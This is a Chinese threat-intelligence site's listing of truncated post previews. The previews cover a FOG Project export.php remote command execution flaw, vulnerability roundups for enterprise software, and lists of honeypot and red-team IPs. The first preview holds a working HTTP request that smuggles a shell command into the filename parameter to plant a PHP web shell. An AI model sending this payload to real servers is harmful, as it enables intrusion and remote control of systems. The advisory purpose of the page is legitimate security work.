fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
【2025你懂的】第三十九期情报 漏洞威胁情报
1. ZKTime 时间精细化管理平台 /api/get_visitor_info 信息泄露漏洞 关联路径:/api/get_visitor_info FOFA自查语法: 关联资产数:9,587 全系产品可检测、可验证:CVD-2024-1223 2. 弥特全流程...
【2025你懂的】第二期情报 IP
移动端如显示不完整请使用电脑查看 IP类别标签地理位置运营商设备类型关基资产112.126.77.215蜜罐陷阱IP中国 北京阿里云否39.102.209.128蜜罐陷阱IP中国 北京阿里云否47.76.144.139蜜罐陷阱IP中...
【在线工具上新】紫兔IP威胁情报查询
集多个情报源,分析出综合数据 访客每天允许体验查询1次 内测用户每次支持最多5个IP同时查询,单天查询上限100次 玉兔会员每次支持最多20个IP同时查询,单天查询上限3000次,支持数据导出 全球...
【2025你懂的】第三十六期情报 漏洞威胁情报
1. 金和OA /c6/JHSoft.Web.Appraise/Dealxm l.aspx/ xm l 外部实体注入漏洞 关联路径:/c6/JHSoft.Web.Appraise/Dealxm l.aspx FOFA自查语法: 关联资产数:75 全系产品可检测、可验证:CVD-202...
【2025你懂的】第十七期情报 威胁情报IP
IP类别地理位置182.44.1.213精选红队IP中国 贵州 贵阳47.95.12.54精选红队IP中国 北京103.163.220.120境外威胁IP日本 东京都 东京103.163.220.109境外威胁IP日本 东京都 东京103.125.146.111境...
【2025你懂的】第十九期情报 威胁情报IP
IP类别地理位置103.125.146.48境外威胁IP日本 东京都 东京104.28.228.30境外威胁IP美国 加利福尼亚州 长滩103.125.146.17境外威胁IP日本 东京都 东京38.34.172.153境外威胁IP美国 加利福尼亚州 ...